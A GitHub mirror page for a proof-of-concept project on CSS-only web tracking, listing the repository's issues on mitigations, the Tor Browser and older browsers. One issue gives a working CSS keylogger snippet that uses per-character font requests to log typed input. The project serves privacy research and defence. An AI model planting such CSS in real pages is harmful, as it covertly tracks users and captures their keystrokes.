GithubHelp home page GithubHelp logo

jbtronics / crookedstylesheets Goto Github PK

View Code? Open in Web Editor NEW
3.3K 106.0 138.0 161 KB

Webpage tracking only using CSS (and no JS)

License: MIT License

HTML 20.00% CSS 48.85% PHP 31.15%
css css-tricks html5 web-tracking proof-of-concept

crookedstylesheets's Issues

Other solution

An other solution would be to block the ability to load dynamic content like php file.

Use invisible css grid to track mouse movements

What if you created an invisible css grid on top of your whole webpage and tracked mouse movement that way. (Sounds way easier and more enjoyable than wrapping everything separately in your markup somehow...

You can try to empty the buffer

我通过观察发现,并不是在能拿到第一次的内容,当过了10分钟后,依然能拿到,所以我认为 可以在缓冲区这上面下手。
1d5aacf2-a7de-45bb-b323-1224f4292cd3

Comma Abuse

I don't mean this to be snarky or mean - Please consider revising the README without the rampant abuse of commas. Nearly every sentence has an unneeded pause introduced by a comma and it makes fluidly reading through your fascinating notes somewhat more difficult.

Remark regarding Tor Browser

So, disabling CSS is not a real option, except when you are very worried about your privacy (for example, when you are using the Tor browser, you should maybe disable CSS).

Actually not required because things like user agent, screen resolution, fonts, etc. are already normalized and should be more or less identical for all users of TBB.

Older Browsers Immune?

Hello, neat CSS trick; it works great on newer browsers that support the CSS methods used. Older browser versions — I tested Firefox v50 and Opera v12 — respond to font tracking only, no other results show; other than that, the CSS on the test page works as expected; i.e., color changes appropriately, etc.

So this is not really a bug…but may be helpful as a mitigation method under the README's prevention section?

Keylogger using webfont with single character unicode-range

Sure, again just a single request per unique character during page visit could be sent, but besides that it seems to work as expected:

<!doctype html>
<title>css keylogger</title>
<style>
@font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
@font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
@font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
@font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
input { font-family: x, 'Comic sans ms'; }
</style>
<input value="a">type `bcd` and watch network log

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.